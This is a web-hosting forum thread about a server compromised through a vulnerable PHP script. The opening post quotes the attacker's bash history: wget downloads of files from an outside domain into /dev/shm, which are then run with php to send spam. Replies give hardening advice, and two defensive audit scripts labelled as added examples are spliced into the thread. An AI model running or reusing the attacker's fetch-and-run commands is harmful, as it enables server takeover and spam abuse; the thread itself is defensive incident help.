  1. #1
    Member
    Join Date
    Apr 2003
    Posts
    142

    tmp shm hack

    This is from .bash_history in /tmp. Any idea how to stop this???

    Code:
    cd /dev/shm
    ls
    mkdir st
    ls
    cd st
    wget promocoesnatal.com/enviar.txt
    wget promocoesnatal.com/cinema.htm
    wget promocoesnatal.com/lista04.txt
    ls
    php -q enviar.txt lista04.txt cinema.htm
    Thanks,
    Michael

  2. #2
    Member Etheral's Avatar
    Join Date
    Dec 2003
    Posts
    210


    You could try disabling /tmp execution powers. There is a tutorial on that at http://webhostgear.com

  3. #3
    BANNED
    Join Date
    Oct 2004
    Posts
    166


    He said they are going to /dev/shm, not /tmp.

    Search the apache logs, someone is running a vulnerable script.
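    One way to do that log search, as an added example that is not part of the thread: a small POSIX shell script that flags access-log requests carrying the indicators seen in the attacker's history in post #1. The indicator list, the decoding of a few common URL escapes before matching, and the sample log lines are my own assumptions and constructed data.

```shell
# Added example, not from the thread: triage an Apache access log for requests
# that carry the indicators from the attacker's history (/dev/shm, wget, php -q).
# A vulnerable script usually receives these URL-encoded in a query string, so a
# few common escapes are decoded before matching. Indicator list and the sample
# log written by write_sample_log are constructed, not real captures.

# Regex of indicators; extend it with what your own incident shows.
SUSPICIOUS_RE='(/dev/shm|wget |curl |php -q)'

# Usage: scan_access_log LOGFILE
# Prints matching lines in decoded form; returns non-zero when nothing matched.
scan_access_log() {
  sed 's/%20/ /g; s|%2[fF]|/|g; s/%3[bB]/;/g; s/%7[cC]/|/g' "$1" | grep -iE "$SUSPICIOUS_RE"
}

# Usage: count_suspicious LOGFILE   -> number of matching lines on stdout
count_suspicious() {
  scan_access_log "$1" | wc -l | tr -d ' '
}

# Constructed combined-format sample; example.invalid is a reserved, non-resolving name.
write_sample_log() {
  cat > "$1" <<'EOF'
203.0.113.5 - - [10/Jan/2005:03:12:01 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jan/2005:03:12:09 +0000] "GET /forum/viewtopic.php?t=12&x=cd%20/dev/shm%3Bwget%20example.invalid/enviar.txt HTTP/1.1" 200 811 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Jan/2005:03:13:44 +0000] "GET /index.php HTTP/1.1" 200 2231 "-" "Mozilla/4.0"
EOF
}

# Stand-alone run over the sample; point scan_access_log at your real access_log instead.
f=$(mktemp); write_sample_log "$f"
echo "suspicious requests: $(count_suspicious "$f")"
scan_access_log "$f"
rm -f "$f"
```

    The matching line tells you which script and which client IP to look at first; the script named in the request path is the one to patch or remove.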

  4. #4
    Member linux-image's Avatar
    Join Date
    Jun 2004
    Location
    India
    Posts
    1,185
    cPanel/Enkompass Access Level

    Root Administrator


    There was a phpBB vulnerability via which you could use wget... maybe it can also be the case. Check at:
    http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

  5. #5
    Member
    Join Date
    Jul 2003
    Posts
    257


    In my php.ini I've entered the following functions into the disabled list and stopped that exploit cold.
    The phpBB fix was also implemented, but just changing the php.ini with those values stopped the problem immediately.

    Code:
    disable_functions = readfile, system, passthru
    ; This directive allows you to disable certain functions for security reasons.
    ; It receives a comma separated list of function names.
    ; This directive is *NOT* affected by whether Safe Mode is turned on or off.

    I strongly suggest modifying your php.ini to have those entries.

    -Alon.

  6. #6
    Member
    Join Date
    Jun 2003
    Location
    Texas USA
    Posts
    7

    enviar.txt

    I cannot believe this is the only post on this - this has happened multiple times and some new hole gets discovered after we have closed the "existing" one - maybe people just don't know it's happening to them? If you are blackholed and you are not a spammer maybe this is why - maybe if you aren't like me and don't get root mail and suddenly get blasted with thousands of rejects from the (words I will not post on what these people are) "jerks" who do this to send their spam through your server - alerting us to the fact that it has "happened" again.

    I searched for enviar.txt and this is the only thing returned - so if there are more threads - please point me their way


    My tech partner used the fix that is in this small post after this started again yesterday - and lo and behold it happened again this morning.

    If someone has TRULY successfully stopped this I would appreciate knowing - other than disallowing wget entirely on the server (which I use because I'm on dialup in the boonies and it kills my productive time having to upload and download) - I would love to know.

    I'm sure not a vindictive person, nor one who wishes harm to others, but I can honestly say - if anyone figures out a way to blow these people's computers out when they hack and steal from others - I'd love to see it - I'd sell tickets and popcorn.

  7. #7
    Super Moderator chirpy's Avatar
    Join Date
    Jun 2002
    Location
    Go on, have a guess
    Posts
    13,495


    There are plenty of threads, it's more a matter of searching for the right thing. You're most likely being compromised through a vulnerable PHP script. So, search these forums to learn how to:

    1. Make sure that you have all of your phpBB forums upgraded to v2.13

    2. Install mod_security and use a strong set of filters

    3. Mount /dev/shm noexec,nosuid

    4. Make sure that you have a firewall installed (iptables if you're on Linux)

    5. Clean your server if it has been compromised and check for rootkit exploits

    6. Make sure that you're running php v4.3.10 and if possible enable phpsuexec

    You can get all that information from the forums and/or you can hire someone to do them for you if you don't have the time.
    Jonathan Michaelson

    Need your cPanel servers secured and tuned?
    cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
    Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
    http://www.configserver.com
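    An added audit script, not from the thread and not from chirpy's csf, that checks step 3 of the list above (noexec,nosuid on /dev/shm) and the php.ini disable_functions entries recommended in post #5. The mounts table and php.ini fragment it writes are constructed samples; the function names are my own.

```shell
# Added example, not from the thread: audit step 3 above (noexec,nosuid on
# /dev/shm) and the disable_functions advice from post #5. check_mount_opts reads
# a /proc/mounts-style table; check_disable_functions reads a php.ini. The inputs
# written by write_samples are constructed, not copied from a real host.

# Usage: check_mount_opts MOUNTPOINT [MOUNTS_FILE]   (default /proc/mounts)
# Prints "MOUNTPOINT: ok" and returns 0 only when both options are present.
check_mount_opts() {
  mp=$1; table=${2:-/proc/mounts}
  # field 2 is the mount point, field 4 the option list; the last entry wins
  opts=$(awk -v mp="$mp" '$2 == mp { o = $4 } END { print o }' "$table")
  [ -n "$opts" ] || { echo "$mp: not mounted"; return 1; }
  missing=""
  for want in noexec nosuid; do
    case ",$opts," in *",$want,"*) ;; *) missing="$missing $want" ;; esac
  done
  [ -z "$missing" ] && { echo "$mp: ok"; return 0; }
  echo "$mp: missing$missing"; return 1
}

# Usage: check_disable_functions PHP_INI
# The last uncommented disable_functions line applies; a trailing ; comment is stripped.
check_disable_functions() {
  ini=$1
  current=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$ini" \
            | tail -n 1 | sed 's/;.*//; s/[[:space:]]//g')
  missing=""
  for fn in readfile system passthru; do
    case ",$current," in *",$fn,"*) ;; *) missing="$missing $fn" ;; esac
  done
  [ -z "$missing" ] && { echo "$ini: ok"; return 0; }
  echo "$ini: not disabled:$missing"; return 1
}

# Constructed samples (not real captures): a mounts table and a php.ini fragment.
write_samples() {
  cat > "$1/mounts" <<'EOF'
/dev/sda1 / ext3 rw 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sda2 /tmp ext3 rw,nosuid 0 0
EOF
  cat > "$1/php.ini" <<'EOF'
disable_functions = system, passthru ; readfile deliberately left enabled
EOF
}

# Stand-alone run over the samples; use /proc/mounts and the php.ini PHP actually loads.
d=$(mktemp -d); write_samples "$d"
check_mount_opts /dev/shm "$d/mounts"; check_mount_opts /tmp "$d/mounts" || true
check_disable_functions "$d/php.ini" || true; rm -rf "$d"
```

    Run against the real files it reports "/dev/shm: missing noexec nosuid" on a default mount, which is exactly the state that let the history in post #1 execute from there.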

  8. #8
    Member
    Join Date
    Jun 2003
    Location
    Texas USA
    Posts
    7

    Thank you Chirpy

    I searched for enviar.txt - since that is the common thread I've seen - but thank you - I'll look and see what I can find.
